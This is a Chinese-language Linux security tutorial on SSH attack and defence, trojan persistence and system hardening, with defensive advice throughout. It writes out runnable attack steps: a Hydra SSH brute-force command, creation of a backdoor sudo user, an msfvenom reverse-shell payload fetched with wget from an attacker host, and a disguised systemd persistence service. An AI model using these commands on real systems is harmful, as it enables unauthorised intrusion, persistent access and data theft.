Linux 网络安全实战全攻略|SSH 攻防 + 木马检测 + 系统加固 附真实攻防案例
本文介绍了Linux系统在网络安全领域的核心地位及其攻防实战技术。主要内容包括:1)Linux作为网安主战场的原因及基础认知;2)SSH服务攻防实战,涵盖暴力破解、后门用户植入等攻击手段及防护措施;3)木马入侵检测技术,分析木马制作、植入及权限维持方式;4)系统安全防护与加固方案,包括日志排查、账户加固、防火墙配置等;5)10类常见Linux安全问题及解决方案。文章强调Linux网络安全的攻防对抗
一、课程导入:为什么 Linux 是网安实战核心?
在网络安全领域,Linux 是绝对的攻防主战场,核心原因:
- 全球80% 以上服务器运行 Linux 系统,攻击价值远高于个人电脑;
- 开源、轻量、稳定,企业云服务器、网络设备、嵌入式设备均以 Linux 为主;
- 命令行高效可控,是渗透测试、应急响应、安全加固的必备系统。
可以说:Windows 打基础,Linux 定实战,是网安从业者的核心技能。
二、初识 Linux:网安必备基础认知
2.1 Linux 起源与发行版
- 1991 年林纳斯・托瓦兹发布 Linux 内核,全球开发者协作完善;
- 发行版 = 内核 + 配套软件,主流分两大系列:
| 系列 | 代表版本 | 应用场景 |
|---|---|---|
| RedHat 系列 | CentOS、RHEL | 企业生产服务器 |
| Debian 系列 | Ubuntu、Kali | 桌面使用、网安实战 |
2.2 Linux 服务器核心优势
| 对比维度 | Windows 服务器 | Linux 服务器 |
|---|---|---|
| 稳定性 | 一般,需定期重启 | 极高,可常年不关机 |
| 安全性 | 漏洞多、攻击面广 | 权限严格、漏洞可控 |
| 运维成本 | 高 | 低 |
| 适用场景 | .NET 专属服务 | Web、数据库、云服务 |
2.3 核心特点:无盘符、纯命令行
Linux没有 C/D/E 盘,所有文件都在根目录/下,操作完全依赖命令行,这也是安全管控更严格的关键。
三、系统服务安全:SSH 服务攻防实战
SSH 是 Linux远程管理核心协议(默认端口 22),类似 Windows 的 RDP,也是黑客攻击 Linux 的第一靶点。
3.1 SSH 基础与环境配置
bash
# 安装SSH服务
apt install openssh-server
# 编辑配置文件
nano /etc/ssh/sshd_config
# 重启服务
service ssh restart
#关键配置项(删除注释并修改)
PermitRootLogin yes
#允许root⽤户远程登录
PasswordAuthentication yes
#允许密码认证
按ctrl+x退出--->按Y回⻋3.2 SSH 攻击实战:暴力破解(Hydra)
Hydra 是 Kali 自带的暴力破解工具,批量尝试账号密码,攻破 SSH 后直接掌控服务器。
前提条件:需准备密码本(包含⼤量可能的密码组合)
bash
# Hydra暴力破解SSH
hydra -l root -P 密码字典.txt ssh://192.168.20.148
🔴 真实安全案例:SSH 弱口令导致服务器被挖矿某企业云服务器开启 22 端口,管理员使用root/123456弱口令。黑客通过 Hydra1 分钟破解,植入门罗币挖矿木马,CPU 占用 100%,服务器瘫痪,业务中断 2 天,损失超 5 万元。✅ 防护启示:禁用 root 远程登录、设置 16 位以上强密码、开启 SSH 密钥登录。:::
3.3 后门用户植入(权限维持)
破解 SSH 后,黑客会创建隐藏后门用户,防止密码修改后失联:
bash
# 创建后门用户
useradd -m backuser
# 设置密码
passwd backuser
# 赋予sudo权限
nano /etc/sudoers
backuser ALL=(ALL:ALL) ALL
3.4 用户与权限管理
Linux 权限是安全核心,UID=0 代表最高权限,黑客会通过提权获取 root:
bash
# 查看UID=0超级用户(排查提权)
awk -F: '$3==0{print $1}' /etc/passwd
# 修改文件权限
chmod 755 文件名
chown 用户:用户组 文件名
🔴 真实安全案例:权限配置错误导致提权入侵某服务器管理员将/etc/sudoers权限设为 777,普通用户直接修改文件获取 root 权限,黑客入侵后删除所有业务数据。✅ 安全规范:系统配置文件权限严格管控,禁止随意赋予 777 权限。:::
四、木马入侵检测:Linux 长期控制技术
木马是黑客控制 Linux 服务器的核心工具,具备隐蔽性、自启性、持久性。
4.1 木马制作(MSF)
Kali 的 MSF 框架可快速生成 Linux 木马:
bash
# 生成Linux反向木马
msfvenom -p linux/x64/shell/reverse_tcp LHOST=192.168.20.131 LPORT=9999 -f elf -o shell.elf
4.2 木马植入与启动
- 攻击机开启 Apache 服务,供目标下载木马;
- 目标通过
wget下载木马,添加执行权限启动:
bash
# 下载木马
wget http://攻击IP/shell.elf
# 添加执行权限
chmod +x shell.elf
# 启动木马
./shell.elf
4.3 三种权限维持方式(黑客常用)
| 维持方式 | 操作命令 | 隐蔽性 |
|---|---|---|
| 计划任务 | crontab -e | 中等 |
| 开机启动项 | ls /etc/init.d/ | 较高 |
| 系统服务伪装 | systemd 配置文件 | 极高 |
bash
# 木马伪装成系统服务(最隐蔽)
nano /etc/systemd/system/sys.service
[Unit]
After=network.target
[Service]
ExecStart=/shell.elf
Restart=always
[Install]
WantedBy=multi-user.target
# 设置开机自启
systemctl enable sys.service
🔴 真实安全案例:木马伪装系统服务,长期窃取数据某政务服务器被植入伪装成systemd-service的木马,开机自动启动,黑客持续窃取内部数据 3 个月,最终通过日志排查发现木马服务。✅ 排查技巧:定期检查陌生系统服务、开机自启项,关闭无用服务。
五、安全防护及加固:Linux 防御实战
5.1 日志排查:服务器的 “监控录像”
日志是入侵溯源、应急响应的核心,Linux 核心日志:
| 日志类型 | 路径 | 查看命令 |
|---|---|---|
| 系统日志 | /var/log/syslog | cat、tail |
| 登录日志 | /var/log/auth.log | grep 筛选 |
| 服务日志 | journalctl -u 服务名 | journalctl |
bash
# 筛选SSH失败登录
journalctl -u ssh | grep 'Failed password'
# 筛选SSH成功登录
journalctl -u ssh | grep 'Accepted password'
5.2 高级审计:auditd(防日志删除)
黑客入侵后会删除日志掩盖痕迹,auditd 是内核级审计工具,无法被篡改:
bash
# 安装auditd
apt install auditd
# 监控useradd命令(防止创建后门用户)
auditctl -w /usr/sbin/useradd -p x -k user_add
# 查看审计记录
ausearch -k user_add
5.3 Linux 系统加固核心(必做)
5.3.1 账户加固(挡住 80% 攻击)
bash
# 禁止root远程登录(最重要)
nano /etc/ssh/sshd_config
PermitRootLogin no
# 重启SSH
systemctl restart sshd
# 删除陌生用户
userdel -r 陌生用户名
5.3.2 防火墙加固(服务器门卫)
bash
# Ubuntu启用UFW防火墙
ufw enable
# 允许22/80/443端口
ufw allow 22/tcp
ufw allow 80/tcp
# 拒绝所有未授权连接
ufw default deny incoming
5.3.3 系统加固
- 定期更新系统,修复漏洞;
- 关闭无用端口与服务;
- 严格管控文件权限;
- 开启日志审计,实时监控异常。
六、Linux 高频网络安全问题及一站式解决方案
结合企业真实运维场景,整理10 类最常见的 Linux 网络安全问题,包含风险原因、真实案例、一键解决方案,直接落地使用。
6.1 SSH 暴力破解 / 异常登录
问题:服务器 22 端口暴露,被黑客批量爆破,出现大量失败登录。解决方案:
- 禁止 root 远程登录;
- 修改 SSH 默认端口(22→10022);
- 开启 SSH 密钥认证,关闭密码认证;
- 配置 IP 白名单,仅允许办公 IP 访问。
bash
# 修改SSH端口
Port 10022
# 关闭密码认证
PasswordAuthentication no
6.2 弱口令 / 空口令账户
问题:服务器存在root/123456、test/test等弱口令,极易被破解。:::warning📌 真实案例:某测试服务器因空口令,被黑客 10 秒入侵,篡改首页。:::解决方案:
- 强制设置 16 位以上复杂密码;
- 开启密码策略,定期更换密码;
- 删除空口令、无用账户。
6.3 端口过度暴露(22/3306/6379)
问题:MySQL、Redis、SSH 端口直接对公网开放,无任何防护。解决方案:
- 防火墙关闭非必要端口;
- 数据库仅允许内网访问,禁止公网映射;
- Redis 设置密码,禁用危险命令。
6.4 文件权限过大(777 权限滥用)
问题:网站目录、系统文件设为 777,任意用户可修改,易被上传木马。解决方案:
- 目录权限 755,文件权限 644;
- 系统配置文件权限≤600;
- 禁止
chmod -R 777操作。
6.5 未知木马 / 挖矿程序驻留
问题:服务器 CPU 占满,出现未知进程,挖矿木马隐蔽运行。解决方案:
- 排查异常进程:
ps -ef | grep unknown; - 查杀木马:删除文件 + 关闭自启项;
- 断开外网连接,清理计划任务、系统服务。
6.6 计划任务 / 开机自启后门
问题:黑客添加定时任务,周期性下载木马、执行恶意指令。解决方案:
- 查看定时任务:
crontab -l、cat /etc/crontab; - 删除异常定时任务;
- 限制普通用户创建计划任务权限。
6.7 未启用防火墙 / 防火墙关闭
问题:服务器防火墙关闭,公网流量无过滤,任意端口可访问。解决方案:
- 启用防火墙(UFW/Firewalld);
- 默认拒绝所有入站,仅放行业务端口;
- 配置防火墙开机自启。
6.8 系统长期不更新,高危漏洞未修复
问题:CentOS/Ubuntu 常年不更新,存在脏牛、sudo 溢出等提权漏洞。解决方案:
- 定期更新:
apt update && apt upgrade -y; - 修复高危漏洞,更新内核;
- 关闭无用服务,减少攻击面。
6.9 日志被清空 / 无法溯源
问题:黑客入侵后执行rm -rf /var/log,删除日志,无法追查攻击痕迹。解决方案:
- 安装 auditd 内核审计,日志防删除;
- 日志远程备份,防止本地删除;
- 监控日志文件完整性。
6.10 SUID 权限提权漏洞
问题:系统文件被设置 SUID 权限,普通用户可提权为 root。解决方案:
- 查找 SUID 文件:
find / -perm -4000 2>/dev/null; - 取消非必要文件的 SUID 权限;
- 限制普通用户执行高危命令。
七、课程总结:Linux 网安攻防核心逻辑
Linux 网络安全的本质是攻防对抗:
- 攻击端:找漏洞(SSH 弱口令)→ 入侵 → 植木马 / 留后门 → 长期控制;
- 防御端:禁风险(root 远程)→ 强加固(防火墙 / 权限)→ 查日志(溯源)→ 清威胁。
核心口诀:禁 root、强密码、关端口;查日志、杀木马、清后门;勤更新、严权限、防提权。
⚠️ 法律声明
本文所有攻防技术仅用于授权渗透测试、服务器安全加固、学习研究。未经许可攻击他人服务器,违反《网络安全法》《刑法》,将依法追究法律责任!
文末互动
Linux 网安实战先吃透 SSH 攻防与系统加固,这是企业安全运维的核心!觉得文章干货满满,点赞 + 收藏 + 关注,后续持续更新 Linux 渗透、应急响应、云安全实战教程!
腾讯云面向开发者汇聚海量精品云计算使用和开发经验,营造开放的云计算技术生态圈。
更多推荐
24
0- 0
已为社区贡献6条内容
所有评论(0)